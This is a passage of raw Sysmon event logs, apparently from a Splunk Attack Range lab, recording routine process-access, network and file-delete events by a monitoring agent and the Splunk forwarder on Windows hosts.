Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016825Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:22.772{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016824Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:22.768{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016823Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:22.747{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016822Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:22.735{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016821Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:22.727{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016820Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:22.713{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016819Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:22.699{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016818Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:22.662{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016817Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:22.648{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016816Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:22.635{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016815Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:22.617{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016814Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:22.600{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016813Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:22.569{E5A8D418-DC44-63C7-1C00-00000000B002}20203312C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A692190) 10341000x800000000000000016812Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:22.554{E5A8D418-DC44-63C7-1C00-00000000B002}20203480C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019414190) 10341000x800000000000000016811Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:22.545{E5A8D418-DC44-63C7-1C00-00000000B002}20203480C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019414190) 354300x800000000000000016810Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:20.030{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal123ntpfalse169.254.169.123-123ntp 23542300x800000000000000016809Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:22.015{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84CE0A85380BA5DB91CEFE802C6002C5,SHA256=F47F24B633F4E69EB717DF4F3C8638D335EEB50C33A05C0124C4E7CBDDF91B35,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044078Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:21.727{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56374-false10.0.1.12-8000- 23542300x800000000000000044077Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:23.234{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8105EB632EB97D623E6759ED2A08FD8F,SHA256=E35D2D9E164E2A08392EE277DAF76ED9382AA194E6B61541281C6FFF4634EFC9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016842Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:23.288{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08452E19ACC13A0507ADCB8B9549D1FA,SHA256=6BB7F5E27429806DCEECCF7F4A60052DD2D1985BB1FE6B84272263D82E7CFAC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044079Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:24.318{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5514BBE25A50C639B8B03058564E6BDE,SHA256=6147563EFE43F52D0644AB003F05EA9A2422FFAEFCFA9B8B0D58C213CB11BC31,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016843Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:24.387{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C757AB43F857F5E4C60CC2A634A9AF73,SHA256=33B53D27FD98983D254CE2277D837BBE5214B324F7ACA817C33360C7B02DAC22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044080Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:25.403{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48B1A1F20F2E34071F1686E441CA6501,SHA256=A441669D7360FF544B73E8CCBE300E9AD419EDE4647F5D70382330D616150975,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000016849Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:25.670{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016848Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:25.670{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016847Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:25.670{E5A8D418-DC43-63C7-0B00-00000000B002}632680C:\Windows\system32\lsass.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+1bfed|C:\Windows\system32\lsasrv.dll+28fbb|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016846Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:25.655{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1C00-00000000B002}2020C:\Program Files\Aurora-Agent\aurora-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000016845Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:25.483{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BE313F203C84376C6F3507C03BE804A,SHA256=F41C68F157FB8E54B3EEFF517AF2A85B1D3006E2A0F79DA545DA6B9260157A4D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000016844Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:24.057{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50113-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000044082Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:26.550{FE4C2B44-D9F5-63C7-1100-00000000AF02}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=138A245246E0DB20EB0565E86D61FAD9,SHA256=3A71E4FDCCA40FD51EA89C4C7A5979139BD7A9BE7EA760DCB9C1F6CA5DD47FA2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044081Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:26.534{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF81515D1C8D36A91C81246DB76219E7,SHA256=18484EC6801DB2F77F05206DF8A53B3FDCD9FE84871FF816463B6D3A1735956C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000016851Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:26.669{E5A8D418-DC43-63C7-0D00-00000000B002}7803800C:\Windows\system32\svchost.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000016850Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:26.548{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85EB9547D27EB444DFD5753B1CA5D2E3,SHA256=A6DCEFC472D6490E90C1898606EFD86C8534C7858BDD46736EA6BBBC11982C75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044084Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:27.618{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B7E616F96B7BBFB82BF7130F79C861FF,SHA256=784F4924BD8FD182C26EA63E1A41C4AA6BD4EA85FEA6DA0417976E9A8570384D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044083Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:27.567{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=746E285FB1A980FB2D9EE0F4CC0A2D36,SHA256=CD2CCC6AFCEDCFD5A3EC75010AC92F9D8FE017B6515AF71524C0128DBC7324E4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016852Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:27.637{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29BC2723E9220887A946C138874E1D41,SHA256=275DB6F3D0B70CCDEE4DF15EF86378F589C660E7C3FAC0EDB987175655EEAE49,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044093Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:28.942{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E4C0-63C7-5106-00000000AF02}3208C:\Program 